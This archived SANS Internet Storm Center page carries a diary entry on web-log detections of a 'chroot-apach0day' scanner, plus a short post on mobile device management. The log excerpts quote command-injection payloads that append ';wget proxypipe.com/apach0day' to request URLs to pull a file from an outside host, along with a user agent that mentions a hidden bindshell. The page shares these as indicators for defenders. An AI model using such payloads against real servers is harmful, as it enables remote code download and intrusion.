Threat Level: green Handler on Duty: Chris Mohan

SANS ISC Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

ISC StormCast for Wednesday, July 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4083
ISC StormCast for Tuesday, July 29th 2014 http://isc.sans.edu/podcastdetail.html?id=4081

Interesting HTTP User Agent "chroot-apach0day"

Published: 2014-07-28
Last Updated: 2014-07-28 23:19:45 UTC
by Johannes Ullrich (Version: 1)
16 comment(s)

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day" 

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

16 comment(s)
ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079

Management and Control of Mobile Device Security

Published: 2014-07-28
Last Updated: 2014-07-28 01:14:06 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

When we talk about mobile devices, all boundaries are gone. Depending where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some case with very little restrictions.

Two points to take in consideration:

- Defining access control: Create one access policy that is applied and control all networks (wireless, VPN, wired)
- Use Mobile Device Management (MDM): Provide the ability to separate data from personal and company-owned assets with approved security controls for any devices whether they are company owned or personal.

These changes should provide greater network visibility allowing your organization to discover devices, measure bandwidth utilization, enforce policies, analyze traffic patterns to monitor for anomalous activity that can drain resources.

We would like to hear from you, what is your organization currently doing to manage mobile devices in your network?

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Interesting HTTP User Agent "chroot-apach0day"
published 1 day ago by Dr. J. (16 comments)

Management and Control of Mobile Device Security
published 2 days ago by Guy (0 comments)

"Internet scanning project" scans
published 4 days ago by Chris (12 comments)

Windows Previous Versions against ransomware
published 6 days ago by Bojan (5 comments)

New Feature: "Live" SSH Brute Force Logs and New Kippo Client
published 1 week ago by Dr. J. (9 comments)

View All Diaries →

Latest Discussions

DSHIELD with fail2ban
created 2 weeks ago by Ernest (0 replies)

Router Upgrade
created 2 weeks ago by ICI2Eye (2 replies)

ENDPOINT SERVICE DEFINITIONS (TCP/UDP)
created 3 weeks ago by Ratatosk (1 reply)

Router- FW Upgrade
created 3 weeks ago by ICI2Eye (0 replies)

Malware infected ATMs in China via specialized device
created 4 weeks ago by Safensoft (0 replies)

View All Forums →

Latest News

View All News →